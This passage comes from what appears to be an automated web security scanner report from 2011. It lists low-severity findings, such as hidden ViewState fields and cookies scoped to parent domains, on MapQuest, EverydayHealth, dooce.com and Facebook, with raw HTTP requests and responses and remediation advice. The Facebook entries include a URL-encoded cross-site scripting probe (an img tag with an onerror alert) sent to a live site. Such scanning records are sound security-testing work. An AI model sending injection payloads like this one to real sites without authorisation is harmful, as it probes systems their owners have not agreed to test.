<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

9.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Request

GET /sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:33 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO9S9eM0ZDUxYzkzYi0zMDJmLTQwYmYtOTcwNC1mNDg4N2I4MDBiZmM1; expires=Wed, 13-Jul-2011 21:36:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4lhmlby1awfarbc5plyur; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47316


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   3 Ways to Put the Wow! Back in Your Sex Life - Sexual Heal
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="...[SNIP]..." />
...[SNIP]...

10. Cookie scoped to parent domain
There are 119 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


10.1. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

10.2. http://www.mapquest.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

10.3. http://www.mapquest.com/_svc/ad/getads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

10.4. http://www.mapquest.com/_svc/apixel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

10.5. http://www.mapquest.com/_svc/publishing/promo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

10.6. http://www.mapquest.com/_svc/searchio

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

10.7. http://www.mapquest.com/cdn/_uac/adpage.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

10.8. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

...[SNIP]...

10.9. http://www.mapquest.com/icons/stop.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

...[SNIP]...

10.10. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.11. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
